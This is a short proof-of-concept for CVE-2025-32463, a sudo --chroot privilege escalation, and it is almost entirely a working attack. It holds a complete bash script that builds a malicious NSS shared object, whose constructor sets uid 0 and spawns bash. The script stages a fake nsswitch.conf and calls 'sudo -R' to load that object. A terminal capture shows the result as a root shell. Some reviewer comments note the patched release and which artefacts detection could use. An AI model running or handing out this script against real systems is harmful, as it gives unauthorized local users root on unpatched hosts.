CVE-2025-32463

Sudo before 1.9.17p1 allows local users to obtain root access because "/etc/nsswitch.conf" from a user-controlled directory is used with the --chroot option.

PoC || GTFO

kdev :: ~ » ./cve-2025-32463.sh 
[*] Triggering escalation...
┌──(root㉿kdev)-[/]
└─# id
uid=0(root) gid=0(root) groups=0(root)
#!/bin/bash
# Proof of concept for CVE-2025-32463 (sudo before 1.9.17p1, per the advisory
# text above): sudo's --chroot (-R) option reads /etc/nsswitch.conf from a
# directory the invoking user controls, so an NSS module named there is loaded
# while sudo is still running as root. Everything below only stages that
# directory and then invokes sudo once.
#
# NOTE(review, defender side): the remedy is the patched sudo release named in
# the advisory. On unpatched hosts the observable artefacts of this script are
# a sudo invocation with -R/--chroot pointing at a non-system directory, a
# shared object compiled under /tmp, and a root bash spawned from sudo --
# confirm which of these your sudo logging and endpoint telemetry actually
# record before relying on them for detection.

WORKDIR=$(mktemp -d /tmp/escalate.XXXXXX)   # scratch directory, removed at the end
cd "${WORKDIR}" || exit 1

# Malicious NSS module
# The C below uses __attribute__((constructor)), so pwn() runs as soon as the
# shared object is loaded, before any NSS lookup function is called; it then
# switches to uid/gid 0 and replaces the process with /bin/bash.
cat > pwn.c << 'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void pwn() {
    setreuid(0, 0);
    setregid(0, 0);
    chdir("/");
    execl("/bin/bash", "bash", NULL);
}
EOF

# Setup fake config environment
# rootfs/ is the directory later passed to `sudo -R`; its nsswitch.conf sends
# passwd lookups to a "service" called /pwn, which is a path rather than a
# service name. /etc/group is copied in as well -- presumably so group lookups
# inside the chroot still resolve; not verified here.
mkdir -p rootfs/etc libnss_
echo "passwd: /pwn" > rootfs/etc/nsswitch.conf
cp /etc/group rootfs/etc

# Build the malicious shared object
# The output path libnss_/pwn.so.2 lines up with the "/pwn" service name
# written above; -Wl,-init,pwn additionally registers pwn() as the ELF init
# routine, on top of the constructor attribute in the source.
gcc -shared -fPIC -Wl,-init,pwn -o libnss_/pwn.so.2 pwn.c

# Execute command in restricted root to trigger NSS lookup
# This is the only privileged step: sudo resolves the user inside rootfs/ and
# in doing so loads the module staged above.
echo "[*] Triggering escalation..."
sudo -R rootfs pwn

# Cleanup
# Runs only if control returns here (the spawned shell replaces the sudo
# process, so in the successful case this is reached once that shell exits).
rm -rf "${WORKDIR}"

